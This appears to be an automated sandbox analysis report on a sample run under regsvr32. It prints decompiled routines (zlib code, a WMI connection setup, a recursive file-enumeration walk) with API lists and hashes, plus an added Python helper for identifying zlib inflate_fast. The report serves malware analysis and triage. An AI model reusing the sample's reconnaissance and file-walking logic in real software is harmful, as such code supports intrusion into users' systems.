            • Instruction Fuzzy Hash: 0A12F132A083518FCB15DE3CC99422ABBE1EB86354F1D8A2DE895D7B41D375AD48C7C1
            Uniqueness

            Uniqueness Score: -1.00%
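            The routine above is recognisable as zlib's inflate_fast() from its three error strings and from the "GenuineIntel" plus family-6/MMX CPUID probe that selects its MMX loop; an analyst wants to confirm that quickly so the CPUID check is not mis-triaged as an anti-analysis trick. The following is an added example, not code from the report or from the sample: it scans a memory blob for those fingerprints and decodes the constants the decompiler left as raw immediates. The sample blob is constructed for the example (it assumes the vendor compares are encoded as `cmp reg, imm32`, i.e. `81 /7 imm32`), and the table-entry layout assumed in `decode_code_entry` is zlib's `code` struct from inftrees.h (op, bits, val).

```python
"""Triage helpers for a decompiled zlib inflate_fast() routine (added example)."""
import struct

# The three error strings that appear in the report's String ID line.
ZLIB_INFLATE_ERRORS = (
    b"invalid literal/length code",
    b"invalid distance code",
    b"invalid distance too far back",
)

# Immediates compared against EBX / EDX / ECX after CPUID leaf 0 in the decompiled probe.
CPUID_VENDOR_IMMS = (0x756E6547, 0x49656E69, 0x6C65746E)


def cpuid_vendor_string(ebx, edx, ecx):
    """Reassemble the 12-byte vendor string in the register order CPUID leaf 0 returns it."""
    return struct.pack("<III", ebx, edx, ecx).decode("ascii")


def cpuid_leaf1_has_p6_mmx(eax, edx):
    """Mirror the second CPUID test of the probe: family (EAX bits 8..11) == 6 and EDX bit 23 (MMX) set."""
    family = (eax >> 8) & 0xF
    return family == 6 and bool(edx & (1 << 23))


def find_inflate_markers(blob):
    """Locate the zlib error strings and the vendor immediates (stored little-endian inside
    `cmp reg, imm32`) in a raw memory blob. Returns the offsets found."""
    found = {"strings": {}, "cpuid_vendor_imms": {}}
    for s in ZLIB_INFLATE_ERRORS:
        off = blob.find(s)
        if off != -1:
            found["strings"][s.decode()] = off
    for imm in CPUID_VENDOR_IMMS:
        off = blob.find(struct.pack("<I", imm))
        if off != -1:
            found["cpuid_vendor_imms"][imm] = off
    return found


def looks_like_zlib_inflate_fast(blob):
    """True when all three error strings and all three vendor immediates are present."""
    m = find_inflate_markers(blob)
    return len(m["strings"]) == 3 and len(m["cpuid_vendor_imms"]) == 3


def decode_code_entry(entry):
    """Split a 32-bit zlib `code` table entry (assumed layout: op byte, bits byte, val word)
    and classify it the way the decompiled loop does: op == 0 literal, op & 64 invalid,
    op & 32 end-of-block, op & 16 length/distance base, otherwise a second-level table
    pointer; op & 15 is the number of extra bits to read."""
    op = entry & 0xFF
    bits = (entry >> 8) & 0xFF
    val = entry >> 16
    if op == 0:
        kind = "literal"
    elif op & 64:
        kind = "invalid"
    elif op & 32:
        kind = "end-of-block"
    elif op & 16:
        kind = "base"
    else:
        kind = "subtable"
    return {"kind": kind, "bits": bits, "val": val, "extra": op & 15}


# Constructed sample blob (made up for this example, not a dump from the report): NOP filler,
# three `cmp ebx/edx/ecx, imm32` instructions carrying the vendor dwords, then the strings.
SAMPLE_BLOB = (
    b"\x90" * 16
    + b"\x81\xfb" + struct.pack("<I", 0x756E6547)   # cmp ebx, "Genu"
    + b"\x81\xfa" + struct.pack("<I", 0x49656E69)   # cmp edx, "ineI"
    + b"\x81\xf9" + struct.pack("<I", 0x6C65746E)   # cmp ecx, "ntel"
    + b"\x00" * 8
    + b"\x00".join(ZLIB_INFLATE_ERRORS) + b"\x00"
)

if __name__ == "__main__":
    print("vendor:", cpuid_vendor_string(*CPUID_VENDOR_IMMS))
    print("zlib inflate_fast markers:", find_inflate_markers(SAMPLE_BLOB))
    print("is inflate_fast:", looks_like_zlib_inflate_fast(SAMPLE_BLOB))
    print("entry 0x00030714:", decode_code_entry(0x00030714))
```

Run it against a dumped code section instead of `SAMPLE_BLOB` to confirm the match; if only the strings hit and the vendor immediates do not, the compare may be encoded with a different register form than the constructed `81 /7` sequence, so fall back to searching the disassembly for the three dword constants.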

            C-Code - Quality: 30%
            			E0099E485(void* __ecx) {
            				char _v8;
            				void* _v12;
            				char* _t15;
            				intOrPtr* _t16;
            				void* _t21;
            				intOrPtr* _t23;
            				intOrPtr* _t24;
            				intOrPtr* _t25;
            				void* _t30;
            				void* _t33;
            
            				_v12 = 0;
            				_v8 = 0;
				__imp__CoInitializeEx(0, 0, _t30, _t33, __ecx, __ecx); // dwCoInit 0 = COINIT_MULTITHREADED (extra arguments are decompiler noise)
				__imp__CoInitializeSecurity(0, 0xffffffff, 0, 0, 0, 3, 0, 0, 0); // cAuthSvc -1, RPC_C_AUTHN_LEVEL_DEFAULT (0), RPC_C_IMP_LEVEL_IMPERSONATE (3), EOAC_NONE
				_t15 =  &_v12;
				__imp__CoCreateInstance(0x9ac8a0, 0, 1, 0x9ac8b0, _t15); // CLSID at 0x9ac8a0, IID at 0x9ac8b0 (their bytes are not shown in this dump), CLSCTX_INPROC_SERVER (1); result in _v12
            				if(_t15 < 0) {
            					L5:
					_t23 = _v8;
					if(_t23 != 0) {
						 *((intOrPtr*)( *_t23 + 8))(_t23); // vtable slot 2 = IUnknown::Release
					}
					_t24 = _v12;
					if(_t24 != 0) {
						 *((intOrPtr*)( *_t24 + 8))(_t24); // IUnknown::Release
					}
            					_t16 = 0;
            				} else {
					__imp__#2(__ecx); // OLEAUT32 ordinal 2 = SysAllocString (resolved in the APIs list below): BSTR from the string passed in ecx
					_t25 = _v12;
					_t21 =  *((intOrPtr*)( *_t25 + 0xc))(_t25, _t15, 0, 0, 0, 0, 0, 0,  &_v8); // vtable slot 3 with eight arguments after this: the shape of IWbemLocator::ConnectServer(strNetworkResource, strUser, strPassword, strLocale, lSecurityFlags, strAuthority, pCtx, ppNamespace); an inference from the call shape, since the CLSID/IID bytes are not in this dump
					if(_t21 < 0) {
						goto L5;
					} else {
						__imp__CoSetProxyBlanket(_v8, 0xa, 0, 0, 3, 3, 0, 0); // RPC_C_AUTHN_WINNT (0xa), RPC_C_AUTHZ_NONE, RPC_C_AUTHN_LEVEL_CALL (3), RPC_C_IMP_LEVEL_IMPERSONATE (3), EOAC_NONE
						if(_t21 < 0) { // as decompiled this re-tests the previous HRESULT; treat it as a lost eax (decompiler artifact) unless the disassembly confirms it
							goto L5;
						} else {
							_t16 = E00998DC9(8); // RtlAllocateHeap(8) per the subcall note below: a two-pointer result struct
							if(_t16 == 0) {
								goto L5;
							} else {
								 *((intOrPtr*)(_t16 + 4)) = _v12; // [4] = object from CoCreateInstance
								 *_t16 = _v8; // [0] = object returned by the slot-3 call
							}
            							}
            						}
            					}
            				}
            				return _t16;
			}

            • Instruction addresses: 0x0099e492 to 0x0099e538 (the per-line address column was flattened by extraction and is omitted)

            APIs
            • CoInitializeEx.OLE32(00000000,00000000,00000000,00000000,00000000,00000000,?,0099E7B4,00000E16,00000000,00000000,00000005), ref: 0099E498
            • CoInitializeSecurity.OLE32(00000000,000000FF,00000000,00000000,00000000,00000003,00000000,00000000,00000000,?,0099E7B4,00000E16,00000000,00000000,00000005), ref: 0099E4A9
            • CoCreateInstance.OLE32(009AC8A0,00000000,00000001,009AC8B0,00000000,?,0099E7B4,00000E16,00000000,00000000,00000005), ref: 0099E4C0
            • SysAllocString.OLEAUT32(00000000), ref: 0099E4CB
            • CoSetProxyBlanket.OLE32(00000005,0000000A,00000000,00000000,00000003,00000003,00000000,00000000,?,0099E7B4,00000E16,00000000,00000000,00000005), ref: 0099E4F6
              • Part of subcall function 00998DC9: RtlAllocateHeap.NTDLL(00000008,?,?,00999793,00000100,?,0099661B), ref: 00998DD7
            Memory Dump Source
            • Source File: 00000003.00000002.269120079.0000000000990000.00000040.00000800.00020000.00000000.sdmp, Offset: 00990000, based on PE: true
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_3_2_990000_regsvr32.jbxd
            Yara matches
            Similarity
            • API ID: Initialize$AllocAllocateBlanketCreateHeapInstanceProxySecurityString
            • String ID:
            • API String ID: 1610782348-0
            • Opcode ID: b11dac799378d784e10c69c2848dc5d95a3a952e050000e8dc528ce56fe12435
            • Instruction ID: 97ccaf703b94ea423cff6da06a37c967929b9af15eda3c7ed7ea124e0eb7fc12
            • Opcode Fuzzy Hash: b11dac799378d784e10c69c2848dc5d95a3a952e050000e8dc528ce56fe12435
            • Instruction Fuzzy Hash: CB212570614245BBEB248B6ADC4DE6BBF7CEFC3B18F11005CF505AA290DA70DA40DAB0
            Uniqueness

            Uniqueness Score: -1.00%

            C-Code - Quality: 78%
            			E0099C123(void* __ecx, void* __fp0, intOrPtr _a16) {
            				char _v12;
            				WCHAR* _v16;
            				struct _WIN32_FIND_DATAW _v608;
            				WCHAR* _t24;
            				intOrPtr _t31;
            				intOrPtr _t41;
            				void* _t45;
            				intOrPtr _t46;
            				void* _t48;
            				intOrPtr _t54;
            				void* _t59;
            				char _t60;
            				void* _t61;
            				void* _t62;
            				void* _t63;
            				void* _t75;
            
            				_t75 = __fp0;
            				_push(0);
            				_t48 = __ecx;
            				_push(L"\\*");
            				_t24 = E00999C50(__ecx);
            				_t63 = _t62 + 0xc;
            				_v16 = _t24;
            				if(_t24 == 0) {
            					return _t24;
            				}
            				_t59 = FindFirstFileW(_t24,  &_v608);
            				if(_t59 == 0xffffffff) {
            					L14:
            					return E00998DDF( &_v16, 0xfffffffe);
            				} else {
            					goto L2;
            				}
            				do {
            					L2:
            					if(E0099C0FB( &(_v608.cFileName)) != 0) {
            						goto L12;
            					}
            					if((_v608.dwFileAttributes & 0x00000010) != 0) {
            						L10:
            						_push(0);
            						_push( &(_v608.cFileName));
            						_push(0x9ac9d8);
            						_t60 = E00999C50(_t48);
            						_t63 = _t63 + 0x10;
            						_v12 = _t60;
            						if(_t60 != 0) {
            							_t54 =  *0x9af8d0; // 0x452f8c0
            							 *((intOrPtr*)(_t54 + 0xc0))(1);
            							_push(1);
            							_push(1);
            							_push(0);
            							E0099C123(_t60, _t75, 1, 5, E009A017A, _a16);
            							_t63 = _t63 + 0x1c;
            							E00998DDF( &_v12, 0xfffffffe);
            						}
            						goto L12;
            					}
            					_t61 = 0;
            					do {
            						_t7 = _t61 + 0x9af9dc; // 0x0
            						_push( *_t7);
            						_push( &(_v608.cFileName));
            						_t41 =  *0x9af8dc; // 0x452fb90
            						if( *((intOrPtr*)(_t41 + 0x18))() == 0) {
            							goto L8;
            						}
            						_t45 = E009A017A(_t75, _t48,  &_v608, _a16);
            						_t63 = _t63 + 0xc;
            						if(_t45 == 0) {
            							break;
            						}
            						_t46 =  *0x9af8d0; // 0x452f8c0
            						 *((intOrPtr*)(_t46 + 0xc0))(1);
            						L8:
            						_t61 = _t61 + 4;
            					} while (_t61 < 4);
            					if((_v608.dwFileAttributes & 0x00000010) == 0) {
            						goto L12;
            					}
            					goto L10;
            					L12:
            				} while (FindNextFileW(_t59,  &_v608) != 0);
            				_t31 =  *0x9af8d0; // 0x452f8c0
            				 *((intOrPtr*)(_t31 + 0x80))(_t59);
            				goto L14;
            			}

            APIs
            • FindFirstFileW.KERNEL32(00000000,?,?,00000000,00000000), ref: 0099C154
            • FindNextFileW.KERNEL32(00000000,?), ref: 0099C237
            Memory Dump Source
            • Source File: 00000003.00000002.269120079.0000000000990000.00000040.00000800.00020000.00000000.sdmp, Offset: 00990000, based on PE: true
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_3_2_990000_regsvr32.jbxd
            Yara matches
            Similarity
            • API ID: FileFind$FirstNext
            • String ID:
            • API String ID: 1690352074-0
            • Opcode ID: b6974015fa785af7ad3ded1e62512b98e3f2794153cf9608756a7d11c4aaa7e2
            • Instruction ID: 79dcd2d7ae7981d41500b9fd42a6e8b4e139a073f08c5fcf1344471199398d04
            • Opcode Fuzzy Hash: b6974015fa785af7ad3ded1e62512b98e3f2794153cf9608756a7d11c4aaa7e2
            • Instruction Fuzzy Hash: 1731C8B1A442146FEF20ABACDC89FAB37ACEF85710F140065F919E71C1EA71DD408BA4
            Uniqueness

            Uniqueness Score: -1.00%

            APIs
            • GetSystemTimeAsFileTime.KERNEL32(?,?,?,?,0099521F,?,?,?,?,?,?,?,?,00000000,00000000,00000000), ref: 0099A205
            Memory Dump Source
            • Source File: 00000003.00000002.269120079.0000000000990000.00000040.00000800.00020000.00000000.sdmp, Offset: 00990000, based on PE: true
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_3_2_990000_regsvr32.jbxd
            Yara matches
            Similarity
            • API ID: Time$FileSystem
            • String ID:
            • API String ID: 2086374402-0
            • Opcode ID: baccee778901827a87bf47f32db76349890a2f2edf4e832c55f1e7d0fdce50be
            • Instruction ID: 1d8968af92f81529dfc05e72aac0edbd395f5d4be7ab0240c749229c34bd4c8e
            • Opcode Fuzzy Hash: baccee778901827a87bf47f32db76349890a2f2edf4e832c55f1e7d0fdce50be
            • Instruction Fuzzy Hash: 43E04875D003146FDB10AF689D09B5AB7BDEBC1B10F118555AC41B3344E570AE0486D1
            Uniqueness

            Uniqueness Score: -1.00%

            C-Code - Quality: 100%
            			E0099DDE7(void* __ecx) {
            				struct _SYSTEM_INFO _v40;
            				void* _t5;
            
            				if(__ecx == 0) {
            					GetSystemInfo( &_v40);
            					return _v40.dwOemId & 0x0000ffff;
            				} else {
            					_t5 = 9;
            					return _t5;
            				}
            			}

            APIs
            • GetSystemInfo.KERNEL32(?,?,?,?,?,?,?,?,?,0099E1C0), ref: 0099DDFA
            Memory Dump Source
            • Source File: 00000003.00000002.269120079.0000000000990000.00000040.00000800.00020000.00000000.sdmp, Offset: 00990000, based on PE: true
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_3_2_990000_regsvr32.jbxd
            Yara matches
            Similarity
            • API ID: InfoSystem
            • String ID:
            • API String ID: 31276548-0
            • Opcode ID: 5c51d6c3c069d6a8a4bdcc3c441be99fc0e23bd944d967e713ebb62605ddc4f4
            • Instruction ID: a06237f877a188b93aac57b45b2fbe79becadf7eba73da9600e67ccba9307c40
            • Opcode Fuzzy Hash: 5c51d6c3c069d6a8a4bdcc3c441be99fc0e23bd944d967e713ebb62605ddc4f4
            • Instruction Fuzzy Hash: 81C08071A1521F57CF149BA9B9566EF73FC5F44689F100455ED03F14C1E960DD4143B0
            Uniqueness

            Uniqueness Score: -1.00%

            C-Code - Quality: 99%
            			E009A82A0(intOrPtr _a4, signed int _a8, signed int _a12) {
            				signed int _v8;
            				signed short* _v12;
            				char _v16;
            				signed short _v20;
            				unsigned int _v24;
            				signed short _v28;
            				signed int _t223;
            				signed int _t235;
            				signed int _t237;
            				signed short _t240;
            				signed int _t241;
            				signed short _t244;
            				signed int _t245;
            				signed short _t248;
            				signed int _t249;
            				signed int _t250;
            				void* _t254;
            				signed char _t259;
            				signed int _t275;
            				signed int _t289;
            				signed int _t308;
            				signed short _t316;
            				signed int _t321;
            				void* _t329;
            				signed short _t330;
            				signed short _t333;
            				signed short _t334;
            				signed short _t343;
            				signed short _t346;
            				signed short _t347;
            				signed short _t348;
            				signed short _t358;
            				signed short _t361;
            				signed short _t362;
            				signed short _t363;
            				signed short _t370;
            				signed int _t373;
            				signed int _t378;
            				signed short _t379;
            				signed short _t382;
            				unsigned int _t388;
            				unsigned short _t390;
            				unsigned short _t392;
            				unsigned short _t394;
            				signed int _t396;
            				signed int _t397;
            				signed int _t398;
            				signed int _t400;
            				signed short _t401;
            				signed int _t402;
            				signed int _t403;
            				signed int _t407;
            				signed int _t409;
            
            				_t223 = _a8;
            				_t235 =  *(_t223 + 2) & 0x0000ffff;
            				_push(_t397);
            				_t388 = 0;
            				_t398 = _t397 | 0xffffffff;
            				if(_a12 < 0) {
            					L42:
            					return _t223;
            				} else {
            					_t329 =  !=  ? 7 : 0x8a;
            					_v12 = _t223 + 6;
            					_t254 = (0 | _t235 != 0x00000000) + 3;
            					_v16 = _a12 + 1;
            					do {
            						_v24 = _t388;
            						_t388 = _t388 + 1;
            						_a8 = _t235;
            						_a12 = _t235;
            						_v8 =  *_v12 & 0x0000ffff;
            						_t223 = _a4;
            						if(_t388 >= _t329) {
            							L4:
            							if(_t388 >= _t254) {
            								if(_a8 == 0) {
            									_t122 = _t223 + 0x16bc; // 0x5d08408b
            									_t400 =  *_t122;
            									if(_t388 > 0xa) {
            										_t168 = _t223 + 0xac4; // 0xfeacb58c
            										_t330 =  *_t168 & 0x0000ffff;
            										_t169 = _t223 + 0xac6; // 0xfffffeac
            										_t237 =  *_t169 & 0x0000ffff;
            										_v24 = _t330;
            										_t171 = _t223 + 0x16b8; // 0x5750038
            										_t333 = (_t330 << _t400 |  *_t171) & 0x0000ffff;
            										_v28 = _t333;
            										if(_t400 <= 0x10 - _t237) {
            											_t259 = _t400 + _t237;
            										} else {
            											_t173 = _t223 + 0x14; // 0xc703f045
            											 *(_t223 + 0x16b8) = _t333;
            											_t175 = _t223 + 8; // 0x8d000040
            											 *((char*)( *_t175 +  *_t173)) = _v28;
            											_t223 = _a4;
            											 *((intOrPtr*)(_t223 + 0x14)) =  *((intOrPtr*)(_t223 + 0x14)) + 1;
            											_t181 = _t223 + 0x14; // 0xc703f045
            											_t182 = _t223 + 8; // 0x8d000040
            											_t183 = _t223 + 0x16b9; // 0x8b057500
            											 *((char*)( *_t181 +  *_t182)) =  *_t183;
            											 *((intOrPtr*)(_t223 + 0x14)) =  *((intOrPtr*)(_t223 + 0x14)) + 1;
            											_t333 = _v24 >> 0x10;
            											_t189 = _t223 + 0x16bc; // 0x5d08408b
            											_t259 =  *_t189 + 0xfffffff0 + _t237;
            										}
            										_t334 = _t333 & 0x0000ffff;
            										 *(_t223 + 0x16bc) = _t259;
            										 *(_t223 + 0x16b8) = _t334;
            										_t401 = _t334 & 0x0000ffff;
            										if(_t259 <= 9) {
            											_t209 = _t388 - 0xb; // -10
            											 *(_t223 + 0x16b8) = _t209 << _t259 | _t401;
            											 *(_t223 + 0x16bc) = _t259 + 7;
            										} else {
            											_t193 = _t223 + 8; // 0x8d000040
            											_t390 = _t388 + 0xfffffff5;
            											_t194 = _t223 + 0x14; // 0xc703f045
            											_t240 = _t390 << _t259 | _t401;
            											 *(_t223 + 0x16b8) = _t240;
            											 *( *_t193 +  *_t194) = _t240;
            											 *((intOrPtr*)(_t223 + 0x14)) =  *((intOrPtr*)(_t223 + 0x14)) + 1;
            											_t199 = _t223 + 0x14; // 0xc703f045
            											_t200 = _t223 + 8; // 0x8d000040
            											_t201 = _t223 + 0x16b9; // 0x8b057500
            											 *((char*)( *_t199 +  *_t200)) =  *_t201;
            											 *((intOrPtr*)(_t223 + 0x14)) =  *((intOrPtr*)(_t223 + 0x14)) + 1;
            											 *(_t223 + 0x16bc) =  *(_t223 + 0x16bc) + 0xfffffff7;
            											 *(_t223 + 0x16b8) = _t390 >> 0x10;
            										}
            										goto L35;
            									}
            									_t123 = _t223 + 0xac0; // 0x3fc458b
            									_t343 =  *_t123 & 0x0000ffff;
            									_t124 = _t223 + 0xac2; // 0xb58c03fc
            									_t241 =  *_t124 & 0x0000ffff;
            									_v24 = _t343;
            									_t126 = _t223 + 0x16b8; // 0x5750038
            									_t346 = (_t343 << _t400 |  *_t126) & 0x0000ffff;
            									_v28 = _t346;
            									if(_t400 > 0x10 - _t241) {
            										_t128 = _t223 + 0x14; // 0xc703f045
            										 *(_t223 + 0x16b8) = _t346;
            										_t130 = _t223 + 8; // 0x8d000040
            										 *((char*)( *_t130 +  *_t128)) = _v28;
            										_t223 = _a4;
            										 *((intOrPtr*)(_t223 + 0x14)) =  *((intOrPtr*)(_t223 + 0x14)) + 1;
            										_t136 = _t223 + 0x14; // 0xc703f045
            										_t137 = _t223 + 8; // 0x8d000040
            										_t138 = _t223 + 0x16b9; // 0x8b057500
            										 *((char*)( *_t136 +  *_t137)) =  *_t138;
            										_t142 = _t223 + 0x16bc; // 0x5d08408b
            										 *((intOrPtr*)(_t223 + 0x14)) =  *((intOrPtr*)(_t223 + 0x14)) + 1;
            										_t346 = _v24 >> 0x10;
            										_t400 =  *_t142 + 0xfffffff0;
            									}
            									_t403 = _t400 + _t241;
            									_t347 = _t346 & 0x0000ffff;
            									 *(_t223 + 0x16bc) = _t403;
            									 *(_t223 + 0x16b8) = _t347;
            									_t348 = _t347 & 0x0000ffff;
            									if(_t403 <= 0xd) {
            										_t163 = _t403 + 3; // 0x5d08408e
            										_t275 = _t163;
            										L28:
            										 *(_t223 + 0x16bc) = _t275;
            										_t165 = _t388 - 3; // -2
            										_t166 = _t223 + 0x16b8; // 0x5750038
            										 *(_t223 + 0x16b8) = (_t165 << _t403 |  *_t166 & 0x0000ffff) & 0x0000ffff;
            									} else {
            										_t392 = _t388 + 0xfffffffd;
            										_t147 = _t223 + 0x14; // 0xc703f045
            										_t244 = _t392 << _t403 | _t348;
            										_t148 = _t223 + 8; // 0x8d000040
            										 *(_t223 + 0x16b8) = _t244;
            										 *( *_t148 +  *_t147) = _t244;
            										 *((intOrPtr*)(_t223 + 0x14)) =  *((intOrPtr*)(_t223 + 0x14)) + 1;
            										_t153 = _t223 + 0x14; // 0xc703f045
            										_t154 = _t223 + 8; // 0x8d000040
            										_t155 = _t223 + 0x16b9; // 0x8b057500
            										 *((char*)( *_t153 +  *_t154)) =  *_t155;
            										 *((intOrPtr*)(_t223 + 0x14)) =  *((intOrPtr*)(_t223 + 0x14)) + 1;
            										 *(_t223 + 0x16bc) =  *(_t223 + 0x16bc) + 0xfffffff3;
            										 *(_t223 + 0x16b8) = _t392 >> 0x00000010 & 0x0000ffff;
            									}
            									goto L35;
            								}
            								_t289 = _a12;
            								if(_t289 != _t398) {
            									_t53 = _t289 * 4; // 0xfffffeac
            									_t396 =  *(_t223 + _t53 + 0xa7e) & 0x0000ffff;
            									_t56 = _t235 * 4; // 0xfeac8d94
            									_t370 =  *(_t223 + _t56 + 0xa7c) & 0x0000ffff;
            									_t58 = _t223 + 0x16bc; // 0x5d08408b
            									_t407 =  *_t58;
            									_v28 = _t370;
            									_t60 = _t223 + 0x16b8; // 0x5750038
            									_t249 = (_t370 << _t407 |  *_t60) & 0x0000ffff;
            									if(_t407 <= 0x10 - _t396) {
            										_t373 = _t249;
            										_t308 = _t407 + _t396;
            									} else {
            										_t61 = _t223 + 0x14; // 0xc703f045
            										_t62 = _t223 + 8; // 0x8d000040
            										 *(_t223 + 0x16b8) = _t249;
            										 *( *_t62 +  *_t61) = _t249;
            										 *((intOrPtr*)(_t223 + 0x14)) =  *((intOrPtr*)(_t223 + 0x14)) + 1;
            										_t67 = _t223 + 0x14; // 0xc703f045
            										_t68 = _t223 + 8; // 0x8d000040
            										_t69 = _t223 + 0x16b9; // 0x8b057500
            										 *((char*)( *_t67 +  *_t68)) =  *_t69;
            										 *((intOrPtr*)(_t223 + 0x14)) =  *((intOrPtr*)(_t223 + 0x14)) + 1;
            										_t75 = _t223 + 0x16bc; // 0x5d08408b
            										_t373 = _v28 >> 0x00000010 & 0x0000ffff;
            										_t308 =  *_t75 + 0xfffffff0 + _t396;
            									}
            									_t388 = _v24;
            									 *(_t223 + 0x16bc) = _t308;
            									 *(_t223 + 0x16b8) = _t373;
            								}
            								_t80 = _t223 + 0xabc; // 0xc80bc323
            								_t358 =  *_t80 & 0x0000ffff;
            								_t81 = _t223 + 0x16bc; // 0x5d08408b
            								_t402 =  *_t81;
            								_t82 = _t223 + 0xabe; // 0x458bc80b
            								_t245 =  *_t82 & 0x0000ffff;
            								_v24 = _t358;
            								_t84 = _t223 + 0x16b8; // 0x5750038
            								_t361 = (_t358 << _t402 |  *_t84) & 0x0000ffff;
            								_v28 = _t361;
            								if(_t402 > 0x10 - _t245) {
            									_t86 = _t223 + 0x14; // 0xc703f045
            									 *(_t223 + 0x16b8) = _t361;
            									_t88 = _t223 + 8; // 0x8d000040
            									 *((char*)( *_t88 +  *_t86)) = _v28;
            									_t223 = _a4;
            									 *((intOrPtr*)(_t223 + 0x14)) =  *((intOrPtr*)(_t223 + 0x14)) + 1;
            									_t94 = _t223 + 0x14; // 0xc703f045
            									_t95 = _t223 + 8; // 0x8d000040
            									_t96 = _t223 + 0x16b9; // 0x8b057500
            									 *((char*)( *_t94 +  *_t95)) =  *_t96;
            									_t100 = _t223 + 0x16bc; // 0x5d08408b
            									 *((intOrPtr*)(_t223 + 0x14)) =  *((intOrPtr*)(_t223 + 0x14)) + 1;
            									_t361 = _v24 >> 0x10;
            									_t402 =  *_t100 + 0xfffffff0;
            								}
            								_t403 = _t402 + _t245;
            								_t362 = _t361 & 0x0000ffff;
            								 *(_t223 + 0x16bc) = _t403;
            								 *(_t223 + 0x16b8) = _t362;
            								_t363 = _t362 & 0x0000ffff;
            								if(_t403 <= 0xe) {
            									_t121 = _t403 + 2; // 0x5d08408d
            									_t275 = _t121;
            									goto L28;
            								} else {
            									_t394 = _t388 + 0xfffffffd;
            									_t105 = _t223 + 0x14; // 0xc703f045
            									_t248 = _t394 << _t403 | _t363;
            									_t106 = _t223 + 8; // 0x8d000040
            									 *(_t223 + 0x16b8) = _t248;
            									 *( *_t106 +  *_t105) = _t248;
            									 *((intOrPtr*)(_t223 + 0x14)) =  *((intOrPtr*)(_t223 + 0x14)) + 1;
            									_t111 = _t223 + 0x14; // 0xc703f045
            									_t112 = _t223 + 8; // 0x8d000040
            									_t113 = _t223 + 0x16b9; // 0x8b057500
            									 *((char*)( *_t111 +  *_t112)) =  *_t113;
            									 *((intOrPtr*)(_t223 + 0x14)) =  *((intOrPtr*)(_t223 + 0x14)) + 1;
            									 *(_t223 + 0x16bc) =  *(_t223 + 0x16bc) + 0xfffffff2;
            									 *(_t223 + 0x16b8) = _t394 >> 0x00000010 & 0x0000ffff;
            									goto L35;
            								}
            							} else {
            								_t316 = _t223 + (_t235 + 0x29f) * 4;
            								_v28 = _t316;
            								do {
            									_t378 = _a12;
            									_t22 = _t223 + 0x16bc; // 0x5d08408b
            									_t409 =  *_t22;
            									_t24 = _t378 * 4; // 0xfffffeac
            									_t250 =  *(_t223 + _t24 + 0xa7e) & 0x0000ffff;
            									_t379 =  *_t316 & 0x0000ffff;
            									_v24 = _t379;
            									_t27 = _t223 + 0x16b8; // 0x5750038
            									_t382 = (_t379 << _t409 |  *_t27) & 0x0000ffff;
            									_v20 = _t382;
            									if(_t409 <= 0x10 - _t250) {
            										_t321 = _t409 + _t250;
            									} else {
            										_t29 = _t223 + 0x14; // 0xc703f045
            										 *(_t223 + 0x16b8) = _t382;
            										_t31 = _t223 + 8; // 0x8d000040
            										 *((char*)( *_t31 +  *_t29)) = _v20;
            										_t223 = _a4;
            										 *((intOrPtr*)(_t223 + 0x14)) =  *((intOrPtr*)(_t223 + 0x14)) + 1;
            										_t37 = _t223 + 0x14; // 0xc703f045
            										_t38 = _t223 + 8; // 0x8d000040
            										_t39 = _t223 + 0x16b9; // 0x8b057500
            										 *((char*)( *_t37 +  *_t38)) =  *_t39;
            										 *((intOrPtr*)(_t223 + 0x14)) =  *((intOrPtr*)(_t223 + 0x14)) + 1;
            										_t382 = _v24 >> 0x10;
            										_t45 = _t223 + 0x16bc; // 0x5d08408b
            										_t321 =  *_t45 + 0xfffffff0 + _t250;
            									}
            									 *(_t223 + 0x16bc) = _t321;
            									_t316 = _v28;
            									 *(_t223 + 0x16b8) = _t382 & 0x0000ffff;
            									_t388 = _t388 - 1;
            								} while (_t388 != 0);
            								L35:
            								_t235 = _v8;
            								_t388 = 0;
            								_t398 = _a12;
            								if(_t235 != 0) {
            									if(_a8 != _t235) {
            										_t329 = 7;
            										_t217 = _t329 - 3; // 0x4
            										_t254 = _t217;
            									} else {
            										_t329 = 6;
            										_t216 = _t329 - 3; // 0x3
            										_t254 = _t216;
            									}
            								} else {
            									_t329 = 0x8a;
            									_t214 = _t388 + 3; // 0x3
            									_t254 = _t214;
            								}
            								goto L41;
            							}
            						}
            						_t223 = _a4;
            						if(_t235 == _v8) {
            							_t235 = _v8;
            							goto L41;
            						}
            						goto L4;
            						L41:
            						_v12 =  &(_v12[2]);
            						_t221 =  &_v16;
            						 *_t221 = _v16 - 1;
            					} while ( *_t221 != 0);
            					goto L42;
            				}
            			}

            Memory Dump Source
            • Source File: 00000003.00000002.269120079.0000000000990000.00000040.00000800.00020000.00000000.sdmp, Offset: 00990000, based on PE: true
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_3_2_990000_regsvr32.jbxd
            Yara matches
            Similarity
            • API ID:
            • String ID:
            • API String ID:
            • Opcode ID: 0050a3338128a3e29d0738b8ec7b1954f4e7d535beab72997c1b6becb188d890
            • Instruction ID: 6163e041bb9e3b0573ecf3f66e7416151c96a7dfa0c7204324b043d6b6f4fe4b
            • Opcode Fuzzy Hash: 0050a3338128a3e29d0738b8ec7b1954f4e7d535beab72997c1b6becb188d890
            • Instruction Fuzzy Hash: E4F17F755092118FC709CF18C4D88FA7BF5AFA9310B1E86FDD8899B3A6D7319980CB91
            Uniqueness

            Uniqueness Score: -1.00%

            Memory Dump Source
            • Source File: 00000003.00000002.269120079.0000000000990000.00000040.00000800.00020000.00000000.sdmp, Offset: 00990000, based on PE: true
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_3_2_990000_regsvr32.jbxd
            Yara matches
            Similarity
            • API ID:
            • String ID:
            • API String ID:
            • Opcode ID: 8739f2d7c1acc7a46c4485d5c450b1e549931cc52f7dc0e9a4c145e61ae0c3cb
            • Instruction ID: 67f4084e1e4c56dfd9f5420b20c10569a7976792bc118d3699ce244920000dec
            • Opcode Fuzzy Hash: 8739f2d7c1acc7a46c4485d5c450b1e549931cc52f7dc0e9a4c145e61ae0c3cb
            • Instruction Fuzzy Hash: 147155316241A64FD704CF2EECD047633A1EB8B311745851EEA85CB395C639E92AFBE0
            Uniqueness

            Uniqueness Score: -1.00%

            Memory Dump Source
            • Source File: 00000003.00000002.269120079.0000000000990000.00000040.00000800.00020000.00000000.sdmp, Offset: 00990000, based on PE: true
            Joe Sandbox IDA Plugin
